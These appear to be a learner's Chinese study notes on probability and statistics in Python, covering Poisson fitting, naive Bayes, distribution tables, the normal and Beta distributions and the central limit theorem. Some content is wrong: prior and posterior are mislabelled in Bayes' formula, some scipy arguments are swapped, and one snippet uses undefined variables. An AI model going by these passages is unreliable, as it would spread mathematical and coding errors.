     参数 mu:  0.0 参数 mu:  1.0 参数 mu:  2.6180339999999998 参数 mu:  5.2360680251559995 参数 mu:  5.273849359457559 参数 mu:  5.334980842922849 参数 mu:  9.032120508519583 参数 mu:  15.014218190203728 参数 mu:  14.555935077084984 参数 mu:  24.69345563048985 参数 mu:  15.014218190203728 参数 mu:  18.71135779832006 参数 mu:  20.996315778882625 参数 mu:  18.38937216738971 参数 mu:  18.18406664294854 参数 mu:  18.217827603959925 参数 mu:  18.219046315052577 参数 mu:  18.2189342781152 参数 mu:  18.218934914073003 参数 mu:  18.21893518372324 参数 mu:  18.218934644422767参数 mu 的估计值: 18.218934644422767

    (3) 直观地描述利用似然函数优化参数$\mu$的过程

    x = np.linspace(1, 60)
    y_min = np.min([poisson_logprob(i, sign=1) for i in x])
    y_max = np.max([poisson_logprob(i, sign=1) for i in x])
    # 根据不同的 mu 值[1,60],画出数据集的似然函数变化曲线
    fig = plt.figure(figsize=(6,4))
    plt.plot(x, [poisson_logprob(mu, sign=1) for mu in x])
    plt.fill_between(x, [poisson_logprob(mu, sign=1) for mu in x], \
    y_min,color='#348ABD',alpha=0.3)
    # 画出似然函数值最大的红色竖线
    plt.vlines(freq_results['x'], y_max, y_min, colors='red', linestyles='dashed')
    plt.scatter(freq_results['x'], y_max, s=110, c='red', zorder=3)
    plt.ylim(ymin=y_min, ymax=0)
    plt.title('Optimization of $\mu$')
    plt.xlabel('$\mu$')
    plt.ylabel('Log probability of $\mu$ given data')
    plt.show()

    png

    (4) 画出求得$\mu$的泊松分布图

    x_lim = 60
    mu = int(freq_results['x'])
    for i in np.arange(x_lim):
    plt.bar(i, stats.poisson.pmf(mu, i), color='#348ABD') # 柱状图
    plt.xlim(0, x_lim)
    plt.ylim(0, 0.1)
    plt.title('Estimated Poisson distribution for QQmessages') # QQ 消息数量的泊松分布估计
    plt.xlabel('Number of QQmessages') # QQ 消息数量
    plt.ylabel('Probability mass')
    plt.legend(['$\mu$ = %s' % mu])
    plt.show()

    png

    8.9 习题

    (1) 编写朴素贝叶斯分类器

    数据包含 3 中类别, 分别是{感冒, 过敏, 脑震荡}, 预测一个打喷嚏的建筑工人诊断结果

    根据贝叶斯公式:

    ${\color{Red}{P(A|B)}}={\color{Blue}{P(A)}}{\color{Green}{\frac{P(B|A)}{P(B)}}}$

    先验概率 = 后验概率 * 可能性函数

    转换成分类任务的表达式:

    $P(类别|特征)=P(类别)\frac{P(特征|类别)}{P(特征)}$

    则有:

    $P(过敏|打喷嚏,建筑工人)=P(过敏)\frac{P(打喷嚏|过敏)\cdot {\color{Red}{P(建筑工人|过敏)}}}{P(打喷嚏,建筑工人)}$
    $P(感冒|打喷嚏,建筑工人)=P(感冒)\frac{P(打喷嚏|感冒)\cdot P(建筑工人|感冒)}{P(打喷嚏,建筑工人)}$
    $P(脑震荡|打喷嚏,建筑工人)=P(脑震荡)\frac { { \color{ Red } { P(打喷嚏|脑震荡) } } \cdot P(建筑工人|脑震荡) } { P(打喷嚏,建筑工人) } $

    其中:

    $P(打喷嚏,建筑工人)=P(过敏)P(打喷嚏|过敏){\color{Red}{P(建筑工人|过敏)}}+$

    $P(感冒)P(打喷嚏|感冒)P(建筑工人|感冒)+P(脑震荡){\color{Red}{P(打喷嚏|脑震荡)}}P(建筑工人|脑震荡)$

    $=P(感冒)P(打喷嚏|感冒)P(建筑工人|感冒)$

    $=\frac{1}{2}\frac{2}{3}\frac{1}{3}$

    $=\frac{1}{9}$

    预测这个打喷嚏的建筑工人得了感冒

    import numpy as np
    import pandas as pd
    from sklearn.naive_bayes import BernoulliNB

    data = np.array([["护士", "打喷嚏", "感冒"], ["农夫", "打喷嚏", "过敏"], ["建筑工人", "头痛", "脑震荡"],
    ["建筑工人", "头痛", "感冒"], ["教师", "打喷嚏", "感冒"], ["教师", "头痛", "脑震荡"]])
    df = pd.DataFrame(data, columns=["职业", "症状", "类别"])
    df
    职业 症状 类别
    0 护士 打喷嚏 感冒
    1 农夫 打喷嚏 过敏
    2 建筑工人 头痛 脑震荡
    3 建筑工人 头痛 感冒
    4 教师 打喷嚏 感冒
    5 教师 头痛 脑震荡
    feature_codes = [{'护士': 0, '农夫': 1, '建筑工人': 2, '教师': 3},
    {'打喷嚏': 0, '头痛': 1},
    {'感冒': 0, '过敏': 1, '脑震荡': 2}]
    for i in range(0, len(df.columns)):
    df.iloc[:, i] = df.iloc[:,i].map(feature_codes[i])
    df
    职业 症状 类别
    0 0 0 0
    1 1 0 1
    2 2 1 2
    3 2 1 0
    4 3 0 0
    5 3 1 2
    train_X = df[['职业', '症状']]
    train_Y = df['类别']
    train_X
    职业 症状
    0 0 0
    1 1 0
    2 2 1
    3 2 1
    4 3 0
    5 3 1
    test_X = pd.DataFrame(np.array([["2", "0"]]), columns=["职业", "症状"]) # 打喷嚏的建筑工人
    test_X
    职业 症状
    0 2 0
    clf = BernoulliNB()
    clf.fit(train_X, train_Y)
    clf.predict(test_X)
    array([0], dtype=int64)

    9 随机变量的几种分布

    先列个表格把几种分布整理下?

    • 离散型
    分布律名称记作数学期望$E(X)$方差$D(X)$备注
    $P{X=0}=1-p, P{X=1}=p$0-1 分布$X\sim B(1,p)$$p$$p(1-p)$n 为 1 的二项分布,例如抛一次硬币
    $P{X=k}=C^{k} _ {n}pkq{1-k}$二项分布$X\sim B(n,p)$$np$$np(1-p)$事件{X=k}即为“n 次试验中事件 A 恰好发生 k 次”
    $P{X=k}=pq^{k-1}$几何分布$X\sim GE(p)$$\frac{1}{p}$$\frac{1-p}{p^2}$在 n 次伯努利试验中,试验 k 次才得到第一次成功的机率
    $P{X=k}=\frac{C^{k} _ {M}C^{n-k} _ {N-M}}{C^{n} _ {N}}$超几何分布$X\sim H(N,n,M)$描述了从有限 N 个物件(其中包含 M 个指定种类的物件)中抽出 n 个物件,成功抽出该指定种类的物件的次数(不放回)
    $P{X=k}=\frac{\lambda k}{k!}e{-\lambda}$泊松分布$X\sim \pi(\lambda)$$\lambda$$\lambda$适合于描述单位时间内随机事件发生的次数, 可用泊松分布近似地计算二项分布($p \le 0.1$时精确度较好)
    • 连续型
    分布函数名称记作数学期望$E(X)$方差$D(X)$备注
    $f(x)=\frac{1}{b-a},a<x<b;0,$其他均匀分布$X\sim (a,b)$$\frac{a+b}{2}$$\frac{(a-b)^2}{12}$也叫矩形分布
    $f(x\mu,\sigma)=\frac{1}{\sqrt{2\pi \sigma2}}e{-\frac{(x-\mu)2}{2\sigma2}}$正态分布$X\sim N(\mu,\sigma^2)$$\mu$$\sigma^2$
    $f(x)=\lambda e^{-\lambda x}(x>0); 0,$其他指数分布$X\sim E(\lambda)$$\frac{1}{\lambda}$$\frac{1}{\lambda^2}$唯一具有"无记忆性"的分布, 在已知$x>s$发生条件的下$P(x>s+t)=P(x>t)$
    $f(xn)=\frac{1}{x{\frac{n}{2}\Gamma(\frac{n}{2})}}x{\frac{n}{2}-1}e^{-\frac{x}{2}},x>0;0,x\le 0$卡方分布$U\sim \chi^2(n)$n2n
    t 分布$Z\sim t(n)$0(偶函数)$X\sim N(0,1),Y\sim \chi^2(n), t=\frac{X}{Y/n}$当$n\to \infty$时, 分布无限趋近于标准正态分布
    F 分布$F\sim F(n _ {1},n _ {2}$设$U\sim \chi^2(n _ {1}),V\sim \chi^2(n _ {2})$且$U,V$相互独立, $F=\frac{U/n _ {1}}{V/ n _ {2}}$
    $\Gamma$分布$X\sim \Gamma(\alpha,\beta)$“指数分布”和“卡方分布”都是伽马分布的特例
    beta 分布$X\sim Beta(a,b)$$\frac{\alpha}{\alpha+\beta}$$\frac{\alpha\beta}{(\alpha+\beta)^2(\alpha+\beta+1)}$可以看作是一个概率的概率分布,$x$实际上是对某个随机事件发生的概率估计,$\alpha-1$和$\beta-1$实际上描述了随机事件发生或不发生的次数

    9.1.3 应用 Python 函数库计算正态分布

    1.产生正态随机变量

    from scipy.stats import norm

    print(norm.rvs(), end="\n\n") # 产生一个标准正态分布(均值为 0, 标准差为 1)的随机值

    print(norm.rvs(size=10), end="\n\n") # 产生 10 个标准正态分布的随机值

    print(norm.rvs(loc=10, scale=0.1), end="\n\n") # 产生一个均值为 10, 标准差为 0.1 的正态分布随机值
    -0.15606449742155645[ 1.41915385e+00  9.05180924e-01 -1.65805601e+00 -8.70872873e-05  6.25728572e-01  3.07949177e+00  5.22917613e-01 -6.20181230e-01 -1.23960758e+00  7.47657082e-02]9.901121362547995

    2.计算正态分布概率

    from scipy.stats import norm

    print("P(X < 0.3) = {}".format(norm.cdf(0.3)))

    print("P(-0.2 < X < 0.2) = {}".format(norm.cdf(0.2) - norm.cdf(-0.2)))
    P(X < 0.3) = 0.6179114221889526P(-0.2 < X < 0.2) = 0.15851941887820603

    3.标准正态分布函数图形

    import numpy as np
    import scipy.stats as stats
    import matplotlib.pyplot as plt
    import matplotlib.style as style
    import matplotlib as mpl
    from IPython.core.display import HTML

    # PLOTTING CONFIG 绘图配置
    """
    其实%matplotlib inline 这一句是 IPython 的魔法函数,可以在 IPython 编译器里直接使用,作用是内嵌画图,省略掉 plt.show()这一步,直接显示图像。
    如果不加这一句的话,我们在画图结束之后需要加上 plt.show()才可以显示图像。
    """
    %matplotlib inline
    mpl.rcParams["font.sans-serif"] = ["Microsoft YaHei"]
    mpl.rcParams['axes.unicode_minus'] = False
    style.use('fivethirtyeight')
    plt.rcParams["figure.figsize"] = (14, 7)
    plt.figure(dpi=100) # 把分辨率调到 100

    # PDF 概率密度函数
    plt.plot(np.linspace(-4, 4, 100),
    stats.norm.pdf(np.linspace(-4, 4, 100))
    / np.max(stats.norm.pdf(np.linspace(-3, 3, 100))),
    )
    plt.fill_between(np.linspace(-4, 4, 100),
    stats.norm.pdf(np.linspace(-4, 4, 100))
    / np.max(stats.norm.pdf(np.linspace(-3, 3, 100))),
    alpha=.15,
    )
    # CDF 累积分布函数
    plt.plot(np.linspace(-4, 4, 100),
    stats.norm.cdf(np.linspace(-4, 4, 100)),
    )

    # LEGEND 图例
    plt.text(x=-1.5, y=.7, s="pdf (normed)", rotation=65,
    alpha=.75, weight="bold", color="#008fd5")
    plt.text(x=-.4, y=.5, s="cdf", rotation=55, alpha=.75,
    weight="bold", color="#fc4f30")

    # TICKS 坐标轴
    plt.tick_params(axis = 'both', which = 'major', labelsize = 18)
    plt.axhline(y = 0, color = 'black', linewidth = 1.3, alpha = .7)

    # TITLE 标题
    plt.text(x = -5, y = 1.25, s = "正态分布 - 概述",
    fontsize = 26, weight = 'bold', alpha = .75)
    plt.text(x = -5, y = 1.1,
    s = ('下图是归一化的概率密度函数 (pdf)以及正态分布随机变量 $ y \sim \mathcal{N}(\mu,\sigma) $的累计密度函数(cdf),'
    '其中 $ \mu = 0 $ , $ \sigma = 1$.'),
    fontsize = 19, alpha = .85)
    Text(-5, 1.1, '下图是归一化的概率密度函数 (pdf)以及正态分布随机变量 $ y \\sim \\mathcal{N}(\\mu,\\sigma) $的累计密度函数(cdf),其中 $ \\mu = 0 $ , $ \\sigma = 1$.')

    png

    9.3 泊松分布

    当二项分布中 n 较大, p 较小时, 分布近似于泊松分布, 可以减少计算量

    $$P{X=k}=C^{k} _ {n}(\frac{\lambda}{n})k(1-\frac{\lambda}{n}){n-k}\approx \frac{\lambdak}{k!}e{-\lambda}$$

    若$X$服从参数为$n,p$的二项分布$b(n, p)$,则$X$近似地服从参数为$\lambda=np$的泊松分布

    泊松分布适合描述一段时间(空间)内随机事件发生次数的概率分布. 如一段时间内到达地铁站的人数等.

    9.6 Beta 分布

    Beta 分布可以看作一个概率的概率分布.这个推断实际上是一个后验概率, 可以用贝叶斯公式转换成先验概率的计算, 公式如下:

    $$f(p|X=k)=\frac{P(X=k|p)f(p)}{P(X=k)}$$

    定义 9.8 给定参数$\alpha>0$和$\beta>0$取值范围为$[0,1]$的随机变量$x$的概率密度函数为

    $$Beta(x;\alpha,\beta)=\frac{1}{B(\alpha,\beta)x{\alpha-1}(1-x){\beta-1}}$$

    其中$B(\alpha,\beta)$称为 Beta 函数, 可以表示为

    $$B(\alpha, \beta)=\frac{\Gamma(\alpha)\Gamma(\beta)}{\Gamma(\alpha+\beta)}$$

    Beta 分布有以下特点:

    • Beta(1, 1)等价于 U(0, 1)

    • 作为概率的概率分布, $Beta(x;\alpha,\beta)$上对 x 的积分必定为 1

    • x 实际上是对某个随机事件发生的概率估计, $\alpha-1$和$\beta-1$实际上描述了随机事件发生或不发生的次数

    • Beta 分布是一种后验分布和先验分布的分布律相同的分布, 不同的只是参数发生了变化

    • Beta 分布可以看作多次进行二项分布实验所得到的分布, 可以对随机事件发生的概率的分布进行计算

    9.7 综合实例——估算棒球运动员的击中率

    # IMPORTS
    import numpy as np
    import scipy.stats as stats
    import matplotlib.pyplot as plt
    import matplotlib.style as style
    from IPython.core.display import HTML

    # PLOTTING CONFIG
    %matplotlib inline
    style.use('fivethirtyeight')
    plt.rcParams["figure.figsize"] = (14, 7)

    plt.figure(dpi=100)

    # PDF
    # 中 82, 不中 220
    plt.plot(np.linspace(0, 1, 500),
    stats.beta.pdf(np.linspace(0, 1, 500),a=82,b=220),label='a=82,b=220', \
    linewidth=1
    )

    # 中 84, 不中 220
    plt.plot(np.linspace(0, 1, 500),
    stats.beta.pdf(np.linspace(0, 1, 500),a=84,b=220),label='a=84,b=220', \
    linewidth=2, linestyle='dashed'
    )

    # 中 182, 不中 420
    plt.plot(np.linspace(0, 1, 500),
    stats.beta.pdf(np.linspace(0, 1, 500),a=182,b=420),label='a=182,b=420', \
    linewidth=3
    )

    #AXISES LABEL
    plt.xlabel('X',size=20)
    plt.ylabel('Density of Beta',size=20)

    # TICKS
    plt.tick_params(axis = 'both', which = 'major', labelsize = 18)
    plt.xticks(np.linspace(0,1,11))

    #SHOWING TEXT IN CANVAS
    plt.legend()

    plt.show()

    png

    9.9 习题

    (1) 已知正态随机变量$X\sim N(0,1)$,如果有$P{X < x _ {1}}=0.1$, $P{X < x _ {2}}=0.05$, 对应的$x _ {1}$、$x _ {2}$分别称为正态分布的下分位点, 求$x _ {1}$、$x _ {2}$

    $x _ {1} = \varphi^{-1}(0.1)$

    $x _ {2} = \varphi^{-1}(0.05)$

    from scipy.stats import norm

    x1 = norm.ppf(0.1) # 累计密度函数的反函数
    x2 = norm.ppf(0.05)
    x1, x2
    (-1.2815515655446004, -1.6448536269514729)

    (2) 对于标准正态分布$X\sim N(0,1)$, 绘制正态分布曲线及下 0.05 分位点

    import matplotlib.pyplot as plt
    from scipy.stats import norm
    import numpy as np

    plt.plot(np.linspace(-3, 3, 100), norm.pdf(np.linspace(-3, 3, 100))) # 绘制曲线
    plt.fill_between(np.linspace(-3, norm.ppf(0.05), 50),
    norm.pdf(np.linspace(-3, norm.ppf(0.05), 50)),
    alpha=.15,
    )
    plt.plot([x0, x0], [y0, 0], 'k--', lw=2.5) # 绘制黑色虚线
    plt.annotate("x2= %.2f" % x0, xy=(x0, y0), xycoords='data', xytext=(+30, +30),
    textcoords='offset points', fontsize=16, arrowprops=dict(arrowstyle='->',
    connectionstyle='arc3, rad=.2')) # 输入注释

    plt.show() # 显示图片


    png

    ]]>
    + 正文

    7 描述统计规律 1——概率论基础

    7.1.3 概率和频率

    例 7.3 抛硬币

    抛掷 10 次硬币并计算正面朝上的次数,随着抛掷次数越多,在 Python 中编写程序观察事件发生的频率和概率之间的关系。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    import random


    def coin_trial():
    """
    模拟抛掷 10 次硬币
    """
    heads = 0 # 正面朝上的次数
    for i in range(10):
    if random.random() <= 0.5:
    heads += 1
    return heads


    def simulate(n):
    """
    模拟抛掷 10 * n 次硬币
    """
    trials = []
    for i in range(n):
    trials.append(coin_trial())
    return(sum(trials) / n)
    1
    simulate(1)
    6.0
    1
    simulate(10)
    4.5
    1
    simulate(100)
    4.92
    1
    simulate(1000)
    5.053
    1
    simulate(10000)
    5.0029
    1
    simulate(100000)
    5.01412

    7.4.1 离散型随机变量

    例 7.13 求概率函数概率分布函数

    若某公司生产的某个产品中奖率是 50%, 求购买 4 个同样的产品中奖的概率函数和概率分布函数.(伯努利试验)

    购买 4 个同样的产品为 n 重伯努利试验, 设随机变量 X 为中奖的奖品数, p 为中奖的概率, q 为不中奖的概率, 则概率函数$P _ {n}(X = k) = C^{k} _ {n}pkq{n-k}$, $p = \frac{1}{2}$, $q = \frac{1}{2}$

    X 的取值01234
    对应概率$p _ {k}$$\frac{1}{16}$$\frac{1}{4}$$\frac{3}{8}$$\frac{1}{4}$$\frac{1}{16}$

    概率分布函数如下

    $F(0) = P(X = 0) = \frac{1}{16}$

    $F(1) = P(X = 0) + P(X = 1) = \frac{5}{16}$

    $F(2) = P(X = 0) + P(X = 1) + P(X = 2) = \frac{11}{16}$

    $F(3) = P(X = 0) + P(X = 1) + P(X = 2) + P(X = 3) = \frac{15}{16}$

    $F(4) = P(X = 0) + P(X = 1) + P(X = 2) + P(X = 3) + P(X = 4) = 1$

    例 7.14 在 Python 中画出 例 7.13 的概率函数以及分布函数图

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    import numpy as np
    from scipy import stats
    import matplotlib.pyplot as plt
    from matplotlib.font_manager import FontProperties
    from collections import Counter

    # rcParams 配置
    plt.rcParams["font.sans-serif"] = ["Microsoft YaHei"]
    # 为 True 时, 减号使用 unicode 编码而不是连字符号,请查看 http://en.wikipedia.org/wiki/Plus_and_minus_signs#Character_codes
    plt.rcParams['axes.unicode_minus'] = False

    def Discrete_pmf():
    xk = np.arange(5) # X 所有可能的取值[0 1 2 3 4 5]
    pk = (1 / 16, 1 / 4, 3 / 8, 1 / 4, 1 / 16) # 概率函数
    # name: 实例名称 custm, values: 两个数组的元组_LIKE,可选
    # (xk, pk) 哪里 xk 是整数,并且 pk 是介于 0 和 1 之间的非零概率吗?sum(pk) = 1。xk 和 pk 必须有相同的形状。
    dist = stats.rv_discrete(name='custm', values=(xk, pk))
    rv = dist.rvs(size=100) # rvs: 产生服从指定分布的 100 个随机数, 通过 size 给定随机数的大小
    fig, (ax0, ax1) = plt.subplots(ncols=2, figsize=(10, 5)) # 将窗口划分为 ax0, ax1

    ax0.set_title("概率函数")
    ax0.plot(xk, pk, 'ro', ms=8, mec='r') # 画点, X 轴为 xk, Y 轴为 pk, 红色点图, 红点大小为 8, 红点颜色为 red
    ax0.vlines(xk, 0, pk, colors='r', linestyles='-', lw=2) # 画线, 0 为 Y 轴最下方, 红色, 实线, 宽度为 2
    for i in xk: # 标注数字
    ax0.text(i, pk[i], '%.3f' % pk[i], ha='center', va='bottom')

    ax1.set_title("分布函数")
    pk1 = dist.cdf(xk) # cdf 累积分布函数
    """
    rv 数据序列(绘制的直方图高度服从这个数据序列, 标注的数据并不准确?)
    5 组(0 1 2 3 4),
    density=ture 的意思是保证该面积的积分为 1
    histtype: 直方图类型,‘bar’, ‘barstacked’, ‘step’, ‘stepfilled’
    蓝色
    透明度 0.75
    cumulative=True 频率累加
    """
    ax1.hist(rv, 5, density=True, histtype='step', facecolor='blue',
    alpha=0.75, cumulative=True) # .hist 用于绘制直方图
    for i in xk: # 标注数字
    ax1.text(i, pk1[i], '%.3f' % pk1[i], ha='center', va='bottom')
    print(Counter(rv))


    if __name__ == "__main__":
    Discrete_pmf()
    Counter({1: 30, 3: 30, 2: 28, 4: 7, 0: 5})

    png

    7.4.2 连续型随机变量

    例 7.16 正态分布

    在 Python 中输出正态分布概率密度函数${\color{Red}{f(x)}}$和对应的概率分布函数${\color{Blue}{F(x)}}$

    如果一个随机变量 X 具有概率密度函数, 则称随机变量 X 为正态分布随机变量, 并记为$X\sim N(\mu , \sigma ^{2})$

    ${\color{Red}{f(x)}} = \frac{1}{\sqrt{2\pi}\sigma}e{-\frac{(x-\mu)2}{2\sigma ^2}}, -\infty < x < +\infty$

    下面代码模拟实现了一个均值为$\mu$为 0 和方差$\sigma ^2$为 1 的正态分布

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    import numpy as np
    from numpy import pi
    import matplotlib.pyplot as plt
    import scipy.stats as stats


    def test_norm_pmf():
    mu = 0 # 均值为 0
    sigma = 1 # 方差为 1
    x = np.arange(-5, 5, 0.1) # 分布随机变量 x
    fig, (ax0, ax1) = plt.subplots(ncols=2, figsize=(10, 5))

    # 概率密度函数
    y0 = (1 / ((np.sqrt(2 * pi) * sigma))) * np.exp(-(((x - mu) ** 2)) / (2 * sigma * sigma)) # f(x)
    ax0.plot(x, y0)
    ax0.set_title('Normal: $\mu$ = %.1f, $\sigma^2$ = %.1f' % (mu, sigma))
    ax0.set_xlabel('x')
    ax0.set_ylabel('概率密度函数 Probability density', fontsize=15)

    # 概率分布函数
    y1 = stats.norm.cdf(x, 0, 1) # F(x)
    ax1.plot(x, y1)
    ax1.set_title('Normal: $\mu$ = %.1f, $\sigma^2$ = %.1f' % (mu, sigma))
    ax1.set_xlabel('x')
    ax1.set_ylabel('概率分布函数 Cumulative density', fontsize=15)

    fig.subplots_adjust(wspace=0.4)
    plt.show()


    if __name__ == "__main__":
    test_norm_pmf()

    png

    7.8 高手点拨

    Python 有一个很好的统计推断包, 即 Scipy 中的 stats, 该模块包含了许多概率分布的随机变量, 以及多种常用的数据统计函数, 常用的统计函数如下:

    概念中文名英文名说明
    rvs产生服从指定分布的随机数Random variates of given size.
    pdf概率密度函数Probability Density Function连续性随机变量持有, $P(a<X\le b)=\int _ {a}^{b} f(x)dx$
    pmf概率质量函数Probability Mass Function离散型随机变量持有, 就是离散性随机变量的分布律, $f(x)=P{X = x _ {k}}$
    cdf累积分布函数Cumulative Distribution Fuction又称分布函数$p(X \le x)$
    ppf百分点函数Percent point functioncdf 的反函数
    Sf残差函数Survival function
    stats返回期望和方差(mean(),var())

    常见分布函数

    名称含义
    betabeta 分布
    fF 分布
    gamma伽马分布
    poisson泊松分布
    hypergeom超几何分布
    lognorm对数正态分布
    binom二项分布
    uniform均匀分布
    chi2卡方分布
    cauchy柯西分布
    laplace拉普拉斯分布
    rayleigh瑞利分布
    t学生 t 分布
    norm正态分布
    expon指数分布

    例 7.23 获得 norm 函数的使用说明

    正态分布随机函数

    1
    2
    3
    4
    from scipy import stats
    from scipy.stats import norm

    print(norm.__doc__)

    例 7.24 创建正态分布随机变量及绘图

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    from scipy import stats
    from scipy.stats import norm
    import numpy as np
    import pylab as plt

    X = norm()
    Y = norm(loc = 1.0, scale = 2.0) # 正态分布期望 1.0, 标准差 2.0
    t = np.arange(-10, 10, 0.01)
    plt.plot(t, X.pdf(t), label='$X$', color="red")
    plt.plot(t, Y.pdf(t), "b--", label="$Y$")
    plt.legend()
    plt.show()

    png

    7.9 习题

    (1) 泊松分布

    已知某路口发生事故的概率是每天 2 次, 用 Python 编程求出此处一天发生 0、1、2、3、4 此事故的概率是多少?

    $P(X=r)=\frac {e^{-\lambda} \lambda^{r}}{r!}$, 其中 r 表示给定区间内发生事件的次数,$\lambda$表示每个区间的平均发生次数

    $X _{i}$01234
    $P(X=X _ {i})$$e^{-2}$$2e^{-2}$$2e^{-2}$$\frac{4}{3}e^{-2}$$\frac{2}{3}e^{-2}$
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    import numpy as np
    from scipy import stats
    import matplotlib.pyplot as plt

    #解决中文显示问题
    plt.rcParams['font.sans-serif']=['SimHei']
    plt.rcParams['axes.unicode_minus'] = False

    # 定义随机变量
    mu4 = 2 # 平均值:每天发生 2 次事故
    # 发生事故次数,包含 0 次,1 次,2 次,3 次,4 次事故
    X4 = np.arange(0,5,1)
    pList4 = stats.poisson.pmf(X4,mu4) # poisson 泊松, pmf 离散型随机变量分布律
    print(pList4)
    # 绘图
    plt.plot(X4, pList4, marker='o', linestyle='None', alpha=0.75)
    plt.vlines(X4, 0, pList4, alpha=0.75)
    plt.xlabel('某路口发生 k 次事故')
    plt.ylabel('概率')
    for i in X4: # 标注数字
    plt.text(i, pList4[i], '%.3f' % pList4[i], ha='center', va='bottom')
    plt.title('泊松分布:平均值 mu=%i' % mu4)
    plt.show()
    [0.13533528 0.27067057 0.27067057 0.18044704 0.09022352]

    png

    8 描述统计规律 2——随机变量与概率统计

    • 从这章开始学的有点吃力了,原因是考研的数学二不考概统+本科期间概统没好好学。在重新看了几天川大徐后,开始入手。

    • 我认为这本书在这里的排版不太好,与教科书的顺序一致,内容上也涉及了很多第 9 章的内容。

    切比雪夫不等式

    $P{\left | X - \mu \right | \ge \varepsilon }\le \frac{\sigma2}{\varepsilon2}(\forall \varepsilon >0)$

    $X$落入以均值$\mu$为中心的$\varepsilon$邻域$(\mu - \varepsilon,\mu + \varepsilon)$的概率不低于$1-\frac{\sigma2}{\varepsilon2}$

    8.2 大数定律和中心极限定理

    8.2.1 大数定律

    对命题"当大量重复某一相同实验的时候, 其最后的实验结果可能会稳定在某一数值附近"给予严格论证.

    名称描述
    切比雪夫大数定律独立不同分布, 当 n 充分大时, n 个相互独立的随机变量的算术平均值将比较密集地聚集在它的数学期望附近
    辛钦大数定律独立同分布(切比雪夫大数定律的推论)
    伯努利大数定律一个事件 A 在 n 次独立重复实验中发生的频率$\frac{n _ {A}}{n}$依概率收敛于事件 A 发生的概率 p

    8.2.2 中心极限定理

    在一定条件下, 充分多的相互独立的随机变量的算术平均值将服从正态分布, 不管这些随机变量本身服从什么分布.

    名称描述
    列维——林德伯格独立同分布
    李雅普诺夫独立不同分布
    棣莫弗——拉普拉斯二项分布,独立同分布的特殊情况,表明正态分布是二项分布的极限分布
    定理 8.1 独立同分布的中心极限定理

    前 n 项和$S _ {n}=\Sigma ^{n} _ {k=1}X _ {k} \sim N(n\mu, n\sigma ^2)$

    算数平均值$\bar X = \frac {1}{n}\Sigma ^{n} _ {k=1}X _ {k} \sim N(\mu, \frac {\sigma ^2}{n})$

    算术平均值的标准化$Y _ {n} = \frac {\bar{X}-\mu}{\sigma / \sqrt{n}} \sim N(0,1)$

    无论{$X _ {k}$}服从什么分布,当 n 很大时,其前 n 项的算术平均值$\bar X$的标准化{$Y _ {k}$}服从正态分布 N(0,1)

    定理 8.2 棣莫弗——拉普拉斯定理

    设$X \sim b(n,p)$, 则当 n 很大时

    $P{a < x \le b}\approx \Phi(\frac{b-np}{\sqrt{np(1-p)}})-\Phi(\frac{a-np}{\sqrt{np(1-p)}})$

    • 我们曾用泊松分布近似地计算二项分布($p \le 0.1$时精确度较好), 而以上结论不受 p 值的大小限制

    • 当$n \ge 50$时, 上述正态分布的近似程度可以达到比较满意的精度, n 越大, 精度越高.

    例 8.13 验证中心极限定理

    设有$n$个随机变量$X _ {1},X _ {2},…,X _ {n}$相互独立,并服从$U\left [a,b\right ]$, 则
    $\bar X = \frac{1}{n}\Sigma^{n} _ {k=1}X _ {k}\sim N\left [ \frac{a+b}{2},\frac{(b-a)^2}{12n}\right]$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    import numpy as np
    import matplotlib.pyplot as plt
    import matplotlib as mpl
    from scipy import stats

    # 解决汉字显示
    mpl.rcParams["font.sans-serif"] = ["Microsoft YaHei"]
    mpl.rcParams["axes.unicode_minus"] = False

    f = plt.figure(figsize=(16, 8))
    mean, var = 0.5, 1.0/12 # [0, 1]范围内的均匀分布的均值和方差


    def p_norm(nvr):
    """
    绘制正态分布曲线
    """
    mu = mean
    sigma = np.sqrt(var/nvr)
    norm_dis = stats.norm(mu, sigma) # 定义正态分布对象
    norm_x = np.linspace(0, 1, 128) # 定义域
    pdf = norm_dis.pdf(norm_x) # f(X)
    plt.plot(norm_x, pdf, 'r', alpha=0.6, label='N(${0:.1f}, {1:.2f}^2$)'.format(mu, sigma))
    plt.legend(loc='upper left', prop={'size': 8})


    def sample(rv_num):
    """
    对随机变量(X1+X2+...)进行一次采样
    :return: 这些样本的平均值
    """
    single_sample_dist = stats.uniform(loc=0, scale=1) # 定义[0, 1]上的均匀分布对象
    x = 0
    for j in range(rv_num):
    x += single_sample_dist.rvs()
    x *= 1 / rv_num
    return x


    def plotHist(Sample_num, rv_num, n_):
    """
    画出 n 个随机变量和样本的直方图
    :param Sample_num: 样本数目
    :param rv_num: 随机变量的个数
    :param n_: 图例序号
    """
    x = np.zeros((Sample_num))
    sp = f.add_subplot(2, 2, n_)
    for i in range(Sample_num): # 采样 Sample_num 次
    x[i] = sample(rv_num)
    # 画出直方图
    plt.hist(x, 500, density=True, color='#348ABD', label='{}个随机变量'.format(rv_num))
    plt.setp(sp.get_yticklabels(), visible=False)
    # 画出正态分布曲线
    p_norm(rv_num)


    if __name__ == "__main__":
    Sample_num = 1000
    nvr = ([1, 2, 32, 64])
    for i in range(np.size(nvr)):
    plotHist(Sample_num, nvr[i], i + 1)
    plt.suptitle("服从均匀分布 U[0, 1]的多个随机变量和的均值逼近于正态分布")
    plt.show()

    png

    8.3 数理统计基本概念

